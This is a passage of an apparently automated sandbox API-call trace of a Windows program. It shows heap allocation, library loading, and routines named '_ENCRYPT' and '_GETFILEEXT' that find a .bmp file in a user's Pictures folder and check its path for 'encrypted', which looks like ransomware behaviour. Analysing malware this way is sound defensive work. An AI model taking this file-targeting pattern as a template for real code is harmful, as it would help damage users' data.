hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.634] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.635] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.636] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.636] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7d8 [0040.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c7d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.637] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0040.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.637] CloseHandle (hObject=0x140) returned 1 [0040.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.637] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.638] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.638] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.638] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.638] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.638] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.639] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee1130, ftCreationTime.dwHighDateTime=0x1d5c22e, ftLastAccessTime.dwLowDateTime=0xff7d9b90, ftLastAccessTime.dwHighDateTime=0x1d5bf92, ftLastWriteTime.dwLowDateTime=0xff7d9b90, ftLastWriteTime.dwHighDateTime=0x1d5bf92, nFileSizeHigh=0x0, nFileSizeLow=0xe4ad, dwReserved0=0x0, dwReserved1=0x777648, cFileName="D_O37vI.bmp", cAlternateFileName="")) returned 0x7c20c0 [0040.639] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee1130, ftCreationTime.dwHighDateTime=0x1d5c22e, ftLastAccessTime.dwLowDateTime=0xff7d9b90, ftLastAccessTime.dwHighDateTime=0x1d5bf92, ftLastWriteTime.dwLowDateTime=0xff7d9b90, ftLastWriteTime.dwHighDateTime=0x1d5bf92, nFileSizeHigh=0x0, nFileSizeLow=0xe4ad, dwReserved0=0x0, dwReserved1=0x777648, cFileName="D_O37vI.bmp", cAlternateFileName="")) returned 0x7c20c0 [0040.639] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 